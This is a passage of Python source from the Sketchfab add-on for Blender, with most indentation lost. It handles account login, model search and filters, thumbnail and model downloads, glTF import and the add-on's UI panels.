if not os.path.exists(archive_path):
wm = bpy.context.window_manager
wm.progress_begin(0, 100)
set_log("Downloading model..")
with open(archive_path, "wb") as f:
total_length = r.headers.get('content-length')
if total_length is None: # no content length header
f.write(r.content)
else:
dl = 0
total_length = int(total_length)
for data in r.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
done = int(100 * dl / total_length)
wm.progress_update(done)
set_log("Downloading model..{}%".format(done))
wm.progress_end()
else:
print('Model already downloaded')
gltf_path, gltf_zip = unzip_archive(archive_path)
if gltf_path:
try:
import_model(gltf_path, uid)
except Exception as e:
import traceback
print(traceback.format_exc())
else:
ShowMessage("ERROR", "Download error", "Failed to download model (url might be invalid)")
model = get_sketchfab_model(uid)
set_import_status("Import model ({})".format(model.download_size if model.download_size else 'fetching data'))
return
class SketchfabLoginProps(bpy.types.PropertyGroup):
def update_tr(self, context):
self.status = ''
if self.email != self.last_username or self.password != self.last_password:
self.last_username = self.email
self.last_password = self.password
if not self.password:
set_login_status('ERROR', 'Password is empty')
bpy.ops.wm.sketchfab_login('EXEC_DEFAULT')
email : StringProperty(
name="email",
description="User email",
default=""
)
api_token : StringProperty(
name="API Token",
description="User API Token",
default=""
)
use_mail : BoolProperty(
name="Use mail / password",
description="Use mail/password login or API Token",
default=True,
)
password : StringProperty(
name="password",
description="User password",
subtype='PASSWORD',
default="",
update=update_tr
)
access_token : StringProperty(
name="access_token",
description="oauth access token",
subtype='PASSWORD',
default=""
)
status : StringProperty(name='', default='')
status_type : EnumProperty(
name="Login status type",
items=(('ERROR', "Error", ""),
('INFO', "Information", ""),
('FILE_REFRESH', "Progress", "")),
description="Determines which icon to use",
default='FILE_REFRESH'
)
last_username : StringProperty(default="default")
last_password : StringProperty(default="default")
skfb_api = SketchfabApi()
def get_user_orgs(self, context):
api = get_sketchfab_props().skfb_api
return [(org["uid"], org["displayName"], "") for org in api.user_orgs]
def get_org_projects(self, context):
api = get_sketchfab_props().skfb_api
return [(proj["uid"], proj["name"], proj["name"]) for proj in api.active_org["projects"]]
def get_available_search_domains(self, context):
api = get_sketchfab_props().skfb_api
search_domains = [domain for domain in Config.SKETCHFAB_SEARCH_DOMAIN]
if len(api.user_orgs) and api.use_org_profile:
search_domains = [
("ACTIVE_ORG", "Active Organization", api.active_org["displayName"], 0)
]
for p in get_org_projects(self, context):
search_domains.append(p)
return tuple(search_domains)
def refresh_orgs(self, context):
pprops = get_sketchfab_props_proxy()
if pprops.is_refreshing:
return
props = get_sketchfab_props()
api = props.skfb_api
api.use_org_profile = pprops.use_org_profile
orgs = [org for org in api.user_orgs if org["uid"] == pprops.active_org]
api.active_org = orgs[0] if len(orgs) else None
if pprops.use_org_profile != props.use_org_profile:
props.use_org_profile = pprops.use_org_profile
if pprops.active_org != props.active_org:
props.active_org = pprops.active_org
if props.use_org_profile:
props.search_domain = "ACTIVE_ORG"
pprops.search_domain = "ACTIVE_ORG"
else:
props.search_domain = "DEFAULT"
pprops.search_domain = "DEFAULT"
refresh_search(self, context)
def get_sorting_options(self, context):
api = get_sketchfab_props().skfb_api
if len(api.user_orgs) and api.use_org_profile:
return (
('RELEVANCE', "Relevance", ""),
('RECENT', "Recent", "")
)
else:
return Config.SKETCHFAB_SORT_BY
class SketchfabBrowserPropsProxy(bpy.types.PropertyGroup):
# Search
query : StringProperty(
name="",
update=refresh_search,
description="Query to search",
default="",
options={'SKIP_SAVE'}
)
pbr : BoolProperty(
name="PBR",
description="Search for PBR model only",
default=False,
update=refresh_search,
)
categories : EnumProperty(
name="Categories",
items=Config.SKETCHFAB_CATEGORIES,
description="Show only models of category",
default='ALL',
update=refresh_search
)
face_count : EnumProperty(
name="Face Count",
items=Config.SKETCHFAB_FACECOUNT,
description="Determines which meshes are exported",
default='ANY',
update=refresh_search
)
sort_by : EnumProperty(
name="Sort by",
items=get_sorting_options,
description="Sort ",
update=refresh_search,
)
animated : BoolProperty(
name="Animated",
description="Show only models with animation",
default=False,
update=refresh_search
)
staffpick : BoolProperty(
name="Staffpick",
description="Show only staffpick models",
default=False,
update=refresh_search
)
search_domain : EnumProperty(
name="",
items=get_available_search_domains,
description="Search domain ",
update=refresh_search,
default=None
)
use_org_profile : BoolProperty(
name="Use organisation profile",
description="Download/Upload as a member of an organization.\nSearch queries and uploads will be performed to\nthe organisation and project selected below",
default=False,
update=refresh_orgs
)
active_org : EnumProperty(
name="Org",
items=get_user_orgs,
description="Active org",
update=refresh_orgs
)
is_refreshing : BoolProperty(
name="Refresh",
description="Refresh",
default=False,
)
expanded_filters : bpy.props.BoolProperty(default=False)
class SketchfabBrowserProps(bpy.types.PropertyGroup):
# Search
query : StringProperty(
name="Search",
description="Query to search",
default=""
)
pbr : BoolProperty(
name="PBR",
description="Search for PBR model only",
default=False
)
categories : EnumProperty(
name="Categories",
items=Config.SKETCHFAB_CATEGORIES,
description="Show only models of category",
default='ALL',
)
face_count : EnumProperty(
name="Face Count",
items=Config.SKETCHFAB_FACECOUNT,
description="Determines which meshes are exported",
default='ANY',
)
sort_by : EnumProperty(
name="Sort by",
items=get_sorting_options,
description="Sort ",
)
animated : BoolProperty(
name="Animated",
description="Show only models with animation",
default=False,
)
staffpick : BoolProperty(
name="Staffpick",
description="Show only staffpick models",
default=False,
)
search_domain : EnumProperty(
name="Search domain",
items=get_available_search_domains,
description="Search domain ",
)
use_org_profile : BoolProperty(
name="Use organisation profile",
description="Import/Export as a member of an organization",
default=False,
)
active_org : EnumProperty(
name="Org",
items=get_user_orgs,
description="Active org",
)
status : StringProperty(name='status', default='idle')
use_preview : BoolProperty(
name="Use Preview",
description="Show results using preview widget instead of regular buttons with thumbnails as icons",
default=True
)
search_results = {}
current_key : StringProperty(name='current', default='current')
has_searched_next : BoolProperty(name='next', default=False)
has_searched_prev : BoolProperty(name='prev', default=False)
skfb_api = SketchfabLoginProps.skfb_api
custom_icons = bpy.utils.previews.new()
has_loaded_thumbnails : BoolProperty(default=False)
is_latest_version : IntProperty(default=-1)
import_status : StringProperty(name='import', default='')
manualImportBoolean : BoolProperty(
name="Import from url",
description="Import a downloadable model from a url",
default=False,
)
manualImportPath : StringProperty(
name="Url",
description="Paste full model url:\n* https://sketchfab.com/models/mymodel-XXXX\n* https://sketchfab.com/orgs/XXXX/3d-models/mymodel-YYYY",
default="",
maxlen=1024,
options={'TEXTEDIT_UPDATE'})
def list_current_results(self, context):
skfb = get_sketchfab_props()
# No results:
if 'current' not in skfb.search_results:
return preview_collection['default']
if skfb.has_loaded_thumbnails and 'thumbnails' in preview_collection:
return preview_collection['thumbnails']
res = []
missing_thumbnail = False
if 'current' in skfb.search_results and len(skfb.search_results['current']):
skfb_results = skfb.search_results['current']
for i, result in enumerate(skfb_results):
if result in skfb_results:
model = skfb_results[result]
if model.uid in skfb.custom_icons:
res.append((model.uid, model.title, "", skfb.custom_icons[model.uid].icon_id, i))
else:
res.append((model.uid, model.title, "", preview_collection['skfb']['0'].icon_id, i))
missing_thumbnail = True
else:
print('Result issue')
# Default element to avoid having an empty preview collection
if not res:
res.append(('NORESULTS', 'empty', "", preview_collection['skfb']['0'].icon_id, 0))
preview_collection['thumbnails'] = tuple(res)
skfb.has_loaded_thumbnails = not missing_thumbnail
return preview_collection['thumbnails']
def draw_model_info(layout, model, context):
ui_model_props = layout.box().column(align=True)
row = ui_model_props.row()
row.label(text="{}".format(model.title), icon='OBJECT_DATA')
row.operator("wm.sketchfab_view", text="", icon='LINKED').model_uid = model.uid
ui_model_props.label(text='{}'.format(model.author), icon='ARMATURE_DATA')
if model.license:
ui_model_props.label(text='{}'.format(model.license), icon='TEXT')
else:
ui_model_props.label(text='Fetching..')
if model.vertex_count and model.face_count:
ui_model_stats = ui_model_props.row()
ui_model_stats.label(text='Verts: {} | Faces: {}'.format(Utils.humanify_number(model.vertex_count), Utils.humanify_number(model.face_count)), icon='MESH_DATA')
if(model.animated):
ui_model_props.label(text='Animated: ' + model.animated, icon='ANIM_DATA')
layout.separator()
def draw_import_button(layout, model, context):
import_ops = layout.row()
skfb = get_sketchfab_props()
import_ops.enabled = skfb.skfb_api.is_user_logged() and bpy.context.mode == 'OBJECT' and Utils.is_valid_uuid(model.uid)
if not skfb.skfb_api.is_user_logged():
downloadlabel = 'Log in to download models'
elif bpy.context.mode != 'OBJECT':
downloadlabel = "Import is available only in object mode"
else:
downloadlabel = "Import model"
if model.download_size:
downloadlabel += " ({})".format(model.download_size)
if skfb.import_status:
downloadlabel = skfb.import_status
download_icon = 'IMPORT' if import_ops.enabled else 'INFO'
import_ops.scale_y = 2.0
import_ops.operator("wm.sketchfab_download", icon=download_icon, text=downloadlabel, translate=False, emboss=True).model_uid = model.uid
def set_log(log):
get_sketchfab_props().status = log
def unzip_archive(archive_path):
if os.path.exists(archive_path):
set_import_status('Unzipping model')
import zipfile
try:
zip_ref = zipfile.ZipFile(archive_path, 'r')
extract_dir = os.path.dirname(archive_path)
zip_ref.extractall(extract_dir)
zip_ref.close()
except zipfile.BadZipFile:
            print('Error when unzipping file')
            os.remove(archive_path)
            print('Invalid zip. Try again')
set_import_status('')
return None, None
gltf_file = os.path.join(extract_dir, 'scene.gltf')
return gltf_file, archive_path
else:
print('ERROR: archive doesn\'t exist')
def run_async(func):
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
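# Usage sketch for the decorator above (the function below is illustrative, not
# part of the addon): any plain function can be wrapped so it runs on a
# background thread; the wrapped call returns the Thread object, which the
# caller may join() when it needs the work to have finished.
#
# @run_async
# def prefetch(url):
#     requests.get(url)
#
# t = prefetch(Config.SKETCHFAB_URL)   # returns immediately
# t.join()                             # optional: wait for completion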
def import_model(gltf_path, uid):
bpy.ops.wm.import_modal('INVOKE_DEFAULT', gltf_path=gltf_path, uid=uid)
def build_search_request(query, pbr, animated, staffpick, face_count, category, sort_by):
final_query = '&q={}'.format(query) if query else ''
if animated:
final_query = final_query + '&animated=true'
if staffpick:
final_query = final_query + '&staffpicked=true'
if sort_by == 'LIKES':
final_query = final_query + '&sort_by=-likeCount'
elif sort_by == 'RECENT':
final_query = final_query + '&sort_by=-publishedAt'
elif sort_by == 'VIEWS':
final_query = final_query + '&sort_by=-viewCount'
if face_count == '10K':
final_query = final_query + '&max_face_count=10000'
elif face_count == '50K':
final_query = final_query + '&min_face_count=10000&max_face_count=50000'
elif face_count == '100K':
final_query = final_query + '&min_face_count=50000&max_face_count=100000'
elif face_count == '250K':
final_query = final_query + "&min_face_count=100000&max_face_count=250000"
elif face_count == '250KP':
final_query = final_query + "&min_face_count=250000"
if category != 'ALL':
final_query = final_query + '&categories={}'.format(category)
if pbr:
final_query = final_query + '&pbr_type=metalness'
return final_query
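# Illustrative example of the query string produced above (parameter values
# chosen for demonstration only):
#   build_search_request("castle", pbr=True, animated=True, staffpick=True,
#                        face_count='50K', category='ALL', sort_by='LIKES')
# returns
#   '&q=castle&animated=true&staffpicked=true&sort_by=-likeCount'
#   '&min_face_count=10000&max_face_count=50000&pbr_type=metalness'
# which skfb_api.search() is expected to append to the search endpoint URL.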
def parse_results(r, *args, **kwargs):
ongoingSearches.discard(r.url)
skfb = get_sketchfab_props()
json_data = r.json()
if 'current' in skfb.search_results:
skfb.search_results['current'].clear()
del skfb.search_results['current']
skfb.search_results['current'] = OrderedDict()
for result in list(json_data.get('results', [])):
# Dirty fix to avoid parsing obsolete data
if 'current' not in skfb.search_results:
return
uid = result['uid']
skfb.search_results['current'][result['uid']] = SketchfabModel(result)
if not os.path.exists(os.path.join(Config.SKETCHFAB_THUMB_DIR, uid) + '.jpeg'):
skfb.skfb_api.request_thumbnail(result['thumbnails'], uid)
elif uid not in skfb.custom_icons:
skfb.custom_icons.load(uid, os.path.join(Config.SKETCHFAB_THUMB_DIR, "{}.jpeg".format(uid)), 'IMAGE')
# Make a request to get the download_size for org and own models
"""
model = skfb.search_results['current'][result['uid']]
if model.download_size is None:
api = skfb.skfb_api
def set_download_size(r, *args, **kwargs):
json_data = r.json()
print(json_data)
if 'gltf' in json_data and 'size' in json_data['gltf']:
model.download_size = Utils.humanify_size(json_data['gltf']['size'])
requests.get(Utils.build_download_url(uid, api.use_org_profile, api.active_org), headers=api.headers, hooks={'response': set_download_size})
"""
if json_data['next']:
skfb.skfb_api.next_results_url = json_data['next']
else:
skfb.skfb_api.next_results_url = None
if json_data['previous']:
skfb.skfb_api.prev_results_url = json_data['previous']
else:
skfb.skfb_api.prev_results_url = None
class ThumbnailCollector(threading.Thread):
def __init__(self, url):
self.url = url
threading.Thread.__init__(self)
def set_url(self, url):
self.url = url
def run(self):
if not self.url:
return
requests.get(self.url, stream=True, hooks={'response': self.handle_thumbnail})
def handle_thumbnail(self, r, *args, **kwargs):
uid = r.url.split('/')[4]
if not os.path.exists(Config.SKETCHFAB_THUMB_DIR):
try:
os.makedirs(Config.SKETCHFAB_THUMB_DIR)
except:
pass
thumbnail_path = os.path.join(Config.SKETCHFAB_THUMB_DIR, uid) + '.jpeg'
with open(thumbnail_path, "wb") as f:
total_length = r.headers.get('content-length')
if total_length is None and r.content:
f.write(r.content)
else:
dl = 0
total_length = int(total_length)
for data in r.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
thumbnailsProgress.discard(uid)
props = get_sketchfab_props()
if uid not in props.custom_icons:
props.custom_icons.load(uid, os.path.join(Config.SKETCHFAB_THUMB_DIR, "{}.jpeg".format(uid)), 'IMAGE')
class LoginModal(bpy.types.Operator):
"""Login into your account"""
bl_idname = "wm.login_modal"
bl_label = ""
bl_options = {'INTERNAL'}
is_logging : BoolProperty(default=False)
error : BoolProperty(default=False)
error_message : StringProperty(default='')
def execute(self, context):
return {'FINISHED'}
def handle_mail_login(self, r, *args, **kwargs):
browser_props = get_sketchfab_props()
if r.status_code == 200 and 'access_token' in r.json():
browser_props.skfb_api.access_token = r.json()['access_token']
login_props = get_sketchfab_login_props()
Cache.save_key('username', login_props.email)
Cache.save_key('access_token', browser_props.skfb_api.access_token)
browser_props.skfb_api.build_headers()
set_login_status('INFO', '')
browser_props.skfb_api.request_user_info()
else:
            if 'error_description' in r.json():
                set_login_status('ERROR', 'Failed to authenticate: {}'.format(r.json()['error_description']))
            else:
                set_login_status('ERROR', 'Failed to authenticate: bad login/password')
print('Cannot login.\n {}'.format(r.json()))
self.is_logging = False
def handle_token_login(self, api_token):
browser_props = get_sketchfab_props()
browser_props.skfb_api.api_token = api_token
login_props = get_sketchfab_login_props()
Cache.save_key('api_token', login_props.api_token)
browser_props.skfb_api.build_headers()
set_login_status('INFO', '')
browser_props.skfb_api.request_user_info()
self.is_logging = False
def modal(self, context, event):
if self.error:
self.error = False
set_login_status('ERROR', '{}'.format(self.error_message))
return {"FINISHED"}
if self.is_logging:
            set_login_status('FILE_REFRESH', 'Logging in to your Sketchfab account...')
return {'RUNNING_MODAL'}
else:
return {'FINISHED'}
def invoke(self, context, event):
self.is_logging = True
try:
context.window_manager.modal_handler_add(self)
login_props = get_sketchfab_login_props()
if(login_props.use_mail):
url = '{}&username={}&password={}'.format(Config.SKETCHFAB_OAUTH, urllib.parse.quote_plus(login_props.email), urllib.parse.quote_plus(login_props.password))
requests.post(url, hooks={'response': self.handle_mail_login})
else:
self.handle_token_login(login_props.api_token)
except Exception as e:
self.error = True
self.error_message = str(e)
return {'RUNNING_MODAL'}
class ImportModalOperator(bpy.types.Operator):
"""Imports the selected model into Blender"""
bl_idname = "wm.import_modal"
bl_label = "Import glTF model into Sketchfab"
bl_options = {'INTERNAL'}
gltf_path : StringProperty()
uid : StringProperty()
def execute(self, context):
print('IMPORT')
return {'FINISHED'}
def modal(self, context, event):
if bpy.context.scene.render.engine not in ["CYCLES", "BLENDER_EEVEE"]:
bpy.context.scene.render.engine = Version.ENGINE
gltf_importer = glTFImporter(self.gltf_path)
gltf_importer.read()
try:
            old_objects = [o.name for o in bpy.data.objects] # Get the current objects in order to find the new node hierarchy
BlenderGlTF.create(gltf_importer)
set_import_status('')
Utils.clean_downloaded_model_dir(self.uid)
root_name = Utils.make_model_name(gltf_importer.data)
Utils.clean_node_hierarchy([o for o in bpy.data.objects if o.name not in old_objects], root_name)
return {'FINISHED'}
except Exception:
import traceback
print(traceback.format_exc())
set_import_status('')
return {'FINISHED'}
return {'RUNNING_MODAL'}
def invoke(self, context, event):
context.window_manager.modal_handler_add(self)
set_import_status('Importing...')
return {'RUNNING_MODAL'}
class GetRequestThread(threading.Thread):
def __init__(self, url, callback, headers={}):
self.url = url
self.callback = callback
self.headers = headers
threading.Thread.__init__(self)
def run(self):
requests.get(self.url, headers=self.headers, hooks={'response': self.callback})
class View3DPanel:
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS' if bpy.app.version < (2, 80, 0) else 'UI'
bl_category = 'Sketchfab'
bl_context = 'objectmode'
class SketchfabPanel(View3DPanel, bpy.types.Panel):
bl_options = {'DEFAULT_CLOSED'}
bl_idname = "VIEW3D_PT_sketchfab_about"
bl_label = "About"
@classmethod
def poll(cls, context):
return (context.scene is not None)
def draw(self, context):
skfb = get_sketchfab_props()
if skfb.is_latest_version == 1:
self.bl_label = "Sketchfab plugin v{} (up-to-date)".format(PLUGIN_VERSION)
elif skfb.is_latest_version == 0:
self.bl_label = "Sketchfab plugin v{} (outdated)".format(PLUGIN_VERSION)
self.layout.operator('wm.skfb_new_version', text='New version available', icon='ERROR')
elif skfb.is_latest_version == -2:
self.bl_label = "Sketchfab plugin v{}".format(PLUGIN_VERSION)
# External links
#doc_ui = self.layout.row()
self.layout.operator('wm.skfb_help', text='Documentation', icon='QUESTION')
self.layout.operator('wm.skfb_report_issue', text='Report an issue', icon='ERROR')
self.layout.label(text="Download folder:")
self.layout.label(text=" " + Config.SKETCHFAB_TEMP_DIR)
class LoginPanel(View3DPanel, bpy.types.Panel):
bl_idname = "VIEW3D_PT_sketchfab_login"
bl_label = "Activation / Log in"
#bl_parent_id = "VIEW3D_PT_sketchfab"
is_logged = BoolProperty()
def draw(self, context):
global is_plugin_enabled
if not is_plugin_enabled:
self.layout.operator('wm.skfb_enable', text='Activate add-on', icon="LINKED").enable = True
else:
# LOGIN
skfb_login = get_sketchfab_login_props()
layout = self.layout.box().column(align=True)
layout.enabled = get_plugin_enabled()
if skfb_login.skfb_api.is_user_logged():
login_row = layout.row()
login_row.label(text='Logged in as {}'.format(skfb_login.skfb_api.get_user_info()))
login_row.operator('wm.sketchfab_login', text='Logout', icon='DISCLOSURE_TRI_RIGHT').authenticate = False
if skfb_login.status:
layout.prop(skfb_login, 'status', icon=skfb_login.status_type)
else:
layout.label(text="Login to your Sketchfab account", icon='INFO')
layout.prop(skfb_login, "use_mail")
if skfb_login.use_mail:
layout.prop(skfb_login, "email")
layout.prop(skfb_login, "password")
else:
layout.prop(skfb_login, "api_token")
ops_row = layout.row()
ops_row.operator('wm.sketchfab_signup', text='Create an account', icon='PLUS')
login_icon = "LINKED" if bpy.app.version < (2,80,0) else "USER"
ops_row.operator('wm.sketchfab_login', text='Log in', icon=login_icon).authenticate = True
if skfb_login.status:
layout.prop(skfb_login, 'status', icon=skfb_login.status_type)
class TeamsPanel(View3DPanel, bpy.types.Panel):
bl_idname = "VIEW3D_PT_sketchfab_teams"
bl_label = "Sketchfab for Teams"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
skfb = get_sketchfab_props()
api = skfb.skfb_api
self.layout.enabled = get_plugin_enabled() and api.is_user_logged()
if not api.user_orgs:
self.layout.label(text="You are not part of an organization", icon='INFO')
self.layout.operator("wm.url_open", text='Learn about Sketchfab for Teams').url = "https://sketchfab.com/features/teams"
else:
props = get_sketchfab_props_proxy()
use_org_profile_row = self.layout.row()
use_org_profile_row.prop(props, "use_org_profile")
org_row = self.layout.row()
org_row.prop(props, "active_org")
org_row.enabled = skfb.skfb_api.use_org_profile
pprops = get_sketchfab_props()
class Model:
def __init__(self, _uid):
self.uid = _uid
self.download_size = 0
class SketchfabBrowse(View3DPanel, bpy.types.Panel):
bl_idname = "VIEW3D_PT_sketchfab_browse"
bl_label = "Import"
uid = ''
label = "Search results"
def draw_search(self, layout, context):
prop = get_sketchfab_props()
props = get_sketchfab_props_proxy()
skfb_api = prop.skfb_api
# Add an option to import from url or uid
col = layout.box().column(align=True)
row = col.row()
row.prop(prop, "manualImportBoolean")
if prop.manualImportBoolean:
row = col.row()
row.prop(prop, "manualImportPath")
else:
col = layout.box().column(align=True)
ro = col.row()
ro.label(text="Search")
domain_col = ro.column()
domain_col.scale_x = 1.5
domain_col.enabled = skfb_api.is_user_logged()
domain_col.prop(props, "search_domain")
ro = col.row()
ro.scale_y = 1.25
ro.prop(props, "query")
ro.operator("wm.sketchfab_search", text="", icon='VIEWZOOM')
# User selected own models but is not pro
if props.search_domain == "OWN" and skfb_api.is_user_logged() and not skfb_api.is_user_pro():
col.label(text='A PRO account is required', icon='QUESTION')
col.label(text='to access your personal library')
# Display a collapsible box for filters
col = layout.box().column(align=True)
col.enabled = (props.search_domain != "STORE")
row = col.row()
row.prop(props, "expanded_filters", icon="TRIA_DOWN" if props.expanded_filters else "TRIA_RIGHT", icon_only=True, emboss=False)
row.label(text="Search filters")
if props.expanded_filters:
if props.search_domain in ["DEFAULT", "OWN"]:
col.separator()
col.prop(props, "categories")
col.prop(props, "sort_by")
col.prop(props, "face_count")
row = col.row()
row.prop(props, "pbr")
row.prop(props, "staffpick")
row.prop(props, "animated")
else:
col.separator()
col.prop(props, "sort_by")
col.prop(props, "face_count")
pprops = get_sketchfab_props()
def draw_results(self, layout, context):
props = get_sketchfab_props()
col = layout.box().column(align=True)
if not props.manualImportBoolean:
#results = layout.column(align=True)
col.label(text=self.label)
model = None
result_pages_ops = col.row()
if props.skfb_api.prev_results_url:
result_pages_ops.operator("wm.sketchfab_search_prev", text="Previous page", icon='FRAME_PREV')
if props.skfb_api.next_results_url:
result_pages_ops.operator("wm.sketchfab_search_next", text="Next page", icon='FRAME_NEXT')
#result_label = 'Click below to see more results'
#col.label(text=result_label, icon='INFO')
try:
col.template_icon_view(bpy.context.window_manager, 'result_previews', show_labels=True, scale=8)
except Exception:
print('ResultsPanel: Failed to display results')
pass
if 'current' not in props.search_results or not len(props.search_results['current']):
self.label = 'No results'
return
else:
self.label = "Search results"
if "current" in props.search_results:
if bpy.context.window_manager.result_previews not in props.search_results['current']:
return
model = props.search_results['current'][bpy.context.window_manager.result_previews]
if not model:
return
if self.uid != model.uid:
self.uid = model.uid
if not model.info_requested:
props.skfb_api.request_model_info(model.uid)
model.info_requested = True
draw_model_info(col, model, context)
draw_import_button(col, model, context)
else:
uid = ""
if "sketchfab.com" in props.manualImportPath:
uid = props.manualImportPath[-32:]
m = Model(uid)
draw_import_button(col, m, context)
def draw(self, context):
self.layout.enabled = get_plugin_enabled()
self.draw_search(self.layout, context)
self.draw_results(self.layout, context)
def invoke(self, context, event):
wm = context.window_manager
return wm.invoke_props_dialog(self, width=900, height=850)
class SketchfabExportPanel(View3DPanel, bpy.types.Panel):
#bl_idname = "wm.sketchfab_export" if bpy.app.version == (2, 79, 0) else "VIEW3D_PT_sketchfab_export"
bl_options = {'DEFAULT_CLOSED'}
bl_label = "Export"
bl_idname = "VIEW3D_PT_sketchfab_export"
def draw(self, context):
api = get_sketchfab_props().skfb_api
self.layout.enabled = get_plugin_enabled() and api.is_user_logged()
wm = context.window_manager
props = wm.sketchfab_export
layout = self.layout
# Selection only
layout.prop(props, "selection")
# Model properties
col = layout.box().column(align=True)
if not props.reuploadBoolean:
col.prop(props, "title")
col.prop(props, "description")
col.prop(props, "tags")
col.prop(props, "draft")
col.prop(props, "private")
if props.private:
col.prop(props, "password")
col.prop(props, "reuploadBoolean")
if props.reuploadBoolean:
col.prop(props, "reuploadPath")
# Project selection if member of an org
if api.active_org and api.use_org_profile:
row = layout.row()
row.prop(props, "active_project")
# Upload button
row = layout.row()
row.scale_y = 2.0
upload_label = "Reupload" if props.reuploadBoolean else "Upload"
upload_icon = "EXPORT"
upload_enabled = api.is_user_logged() and bpy.context.mode == 'OBJECT'
if not upload_enabled:
if not api.is_user_logged():
upload_label = "Log in to upload models"
elif bpy.context.mode != 'OBJECT':
upload_label = "Export is only available in object mode"
if sf_state.uploading:
upload_label = "Uploading %s" % sf_state.size_label
upload_icon = "SORTTIME"
row.operator("wm.sketchfab_export", icon=upload_icon, text=upload_label)
model_url = sf_state.model_url
if model_url:
layout.operator("wm.url_open", text="View Online Model", icon='URL').url = model_url
class SketchfabLogger(bpy.types.Operator):
"""Log in / out your Sketchab.com account"""
bl_idname = 'wm.sketchfab_login'
bl_label = 'Sketchfab Login'
bl_options = {'INTERNAL'}
authenticate : BoolProperty(default=True)
def execute(self, context):
        set_login_status('FILE_REFRESH', 'Logging in to your Sketchfab account...')
wm = context.window_manager
if self.authenticate:
wm.sketchfab_browser.skfb_api.login(wm.sketchfab_api.email, wm.sketchfab_api.password, wm.sketchfab_api.api_token)
else:
wm.sketchfab_browser.skfb_api.logout()
wm.sketchfab_api.password = ''
wm.sketchfab_api.last_password = "default"
set_login_status('FILE_REFRESH', '')
return {'FINISHED'}
class SketchfabModel:
def __init__(self, json_data):
self.title = str(json_data['name'])
self.author = json_data['user']['displayName']
self.username = json_data['user']['username']
self.uid = json_data['uid']
self.vertex_count = json_data['vertexCount']
self.face_count = json_data['faceCount']
if 'archives' in json_data and 'gltf' in json_data['archives']:
if 'size' in json_data['archives']['gltf'] and json_data['archives']['gltf']['size']:
self.download_size = Utils.humanify_size(json_data['archives']['gltf']['size'])
else:
self.download_size = None
self.thumbnail_url = os.path.join(Config.SKETCHFAB_THUMB_DIR, '{}.jpeg'.format(self.uid))
# Model info request
self.info_requested = False
self.license = None
self.animated = False
# Download url data
self.download_url = None
self.time_url_requested = None
self.url_expires = None
def ShowMessage(icon = "INFO", title = "Info", message = "Information"):
def draw(self, context):
self.layout.label(text=message)
print("\n{}: {}".format(icon, message))
bpy.context.window_manager.popup_menu(draw, title = title, icon = icon)
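# Usage sketch (the strings are illustrative; 'ERROR' and 'INFO' are standard
# Blender icon names):
#   ShowMessage("ERROR", "Download failed", "Could not reach sketchfab.com")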
class SketchfabDownloadModel(bpy.types.Operator):
"""Import the selected model"""
bl_idname = "wm.sketchfab_download"
bl_label = "Downloading"
bl_options = {'INTERNAL'}
model_uid : bpy.props.StringProperty(name="uid")
def execute(self, context):
skfb_api = context.window_manager.sketchfab_browser.skfb_api
skfb_api.download_model(self.model_uid)
return {'FINISHED'}
class ViewOnSketchfab(bpy.types.Operator):
"""Upload your model to Sketchfab"""
bl_idname = "wm.sketchfab_view"
bl_label = "View the model on Sketchfab"
bl_options = {'INTERNAL'}
model_uid : bpy.props.StringProperty(name="uid")
def execute(self, context):
import webbrowser
webbrowser.open('{}/models/{}'.format(Config.SKETCHFAB_URL, self.model_uid))
return {'FINISHED'}
def clear_search():
skfb = get_sketchfab_props()
skfb.has_loaded_thumbnails = False
skfb.search_results.clear()
skfb.custom_icons.clear()
bpy.data.window_managers['WinMan']['result_previews'] = 0
class SketchfabSearch(bpy.types.Operator):
"""Send a search query to Sketchfab
Searches on the selected domain (all site, own models for PRO+ users, organization...)
and takes into accounts various search filters"""
bl_idname = "wm.sketchfab_search"
bl_label = "Search Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
# prepare request for search
clear_search()
skfb = get_sketchfab_props()
skfb.skfb_api.prev_results_url = None
skfb.skfb_api.next_results_url = None
final_query = build_search_request(skfb.query, skfb.pbr, skfb.animated, skfb.staffpick, skfb.face_count, skfb.categories, skfb.sort_by)
skfb.skfb_api.search(final_query, parse_results)
return {'FINISHED'}
class SketchfabSearchNextResults(bpy.types.Operator):
"""Loads the next batch of 24 models from the search results"""
bl_idname = "wm.sketchfab_search_next"
bl_label = "Search Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
# prepare request for search
clear_search()
skfb_api = get_sketchfab_props().skfb_api
skfb_api.search_cursor(skfb_api.next_results_url, parse_results)
return {'FINISHED'}
class SketchfabSearchPreviousResults(bpy.types.Operator):
"""Loads the previous batch of 24 models from the search results"""
bl_idname = "wm.sketchfab_search_prev"
bl_label = "Search Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
# prepare request for search
clear_search()
skfb_api = get_sketchfab_props().skfb_api
skfb_api.search_cursor(skfb_api.prev_results_url, parse_results)
return {'FINISHED'}
class SketchfabCreateAccount(bpy.types.Operator):
"""Create an account on sketchfab.com"""
bl_idname = "wm.sketchfab_signup"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
import webbrowser
webbrowser.open(Config.SKETCHFAB_SIGNUP)
return {'FINISHED'}
class SketchfabNewVersion(bpy.types.Operator):
"""Opens addon latest available release on github"""
bl_idname = "wm.skfb_new_version"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
import webbrowser
webbrowser.open('{}/releases/latest'.format(Config.GITHUB_REPOSITORY_URL))
return {'FINISHED'}
class SketchfabReportIssue(bpy.types.Operator):
"""Open an issue on github tracker"""
bl_idname = "wm.skfb_report_issue"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
import webbrowser
webbrowser.open(Config.SKETCHFAB_REPORT_URL)
return {'FINISHED'}
class SketchfabHelp(bpy.types.Operator):
"""Opens the addon README on github"""
bl_idname = "wm.skfb_help"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
import webbrowser
webbrowser.open('{}/releases/latest'.format(Config.GITHUB_REPOSITORY_URL))
return {'FINISHED'}
def activate_plugin():
props = get_sketchfab_props()
login = get_sketchfab_login_props()
# Fill login/access_token
cache_data = Cache.read()
if 'username' in cache_data:
